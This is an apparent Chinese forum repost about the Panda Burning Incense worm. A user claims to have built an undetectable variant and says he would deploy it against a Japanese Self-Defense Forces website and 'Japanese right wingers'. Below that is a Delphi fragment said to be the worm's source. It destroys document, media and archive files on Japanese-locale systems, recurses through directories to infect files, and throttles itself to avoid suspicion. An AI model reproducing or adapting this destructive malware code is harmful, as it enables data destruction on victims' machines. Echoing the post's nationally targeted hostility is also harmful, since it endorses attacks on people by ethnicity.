我爱尤那

无知！
你动态跟踪过熊猫没有？
或许你只是道听途说就到处乱喊，
连它有没有加壳你都不知道吧？
看过它的反汇编代码没有？

我看过，我跟踪调试过代码，
里面我敢百分之百的肯定有汇编语言写的，
就是插到被感染的exe程序的那段，
先loadlibrary加载kernel32.dll
再分别获取函数的内存地址，最后才调用这些函数来检测、释放、运行病毒文件和原来的exe文件
其中修改OEP以及获取函数地址的手法明显是用汇编写的，
完全没有delphi生成的那些多余代码
或许很少人发现，其中有一个部件是vb写的

顺便透露一句，我已经成功的做出了熊猫的免杀变种，
最近又用vc6.0仿写了一次，绝对是彻底免杀的，
因为我根本就没发布，杀毒软件也不会认识它

当然，这些只是技术研究，我也不打算发布出去，
如果我能早三年写出来就好了，2004年8月跟日本那次网战，
如果那时手上就有熊猫变种的话我会豪不犹豫的挂在自卫队的网站上，
那时候我们最先搞定的就是自卫队。

我会为日本右翼留着它的。

csdn上看到的

我爱尤那

if IsJap then //是倭文操作系统
          begin
            if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
              (Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
              (Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
              (Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
              (Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
              (Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
                SmashFile(Fn); //摧毁文件
          end;
        end;
      end;
      //感染或删除一个文件后睡眠200毫秒，避免CPU占用率过高引起怀疑
      Sleep(200);
    until (FindNext(SearchRec) <> 0);
  end;
  FindClose(SearchRec);
  SubDir := TStringList.Create;
  if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
  begin
    repeat
      if IsValidDir(SearchRec) = 1 then
        SubDir.Add(SearchRec.Name);
    until (FindNext(SearchRec) <> 0);
    end;
  FindClose(SearchRec);
  Count := SubDir.Count - 1;
  for i := 0 to Count do
    LoopFiles(Path + SubDir.Strings + '', Mask);
  FreeAndNil(SubDir);
end;
{ 遍历磁盘上所有的文件 }
procedure InfectFiles;

var
  DriverList: string;
  i, Len: Integer;
begin
  if GetACP = 932 then //日文操作系统
    IsJap := True; //去死吧！

据说是熊猫烧香中的源代码..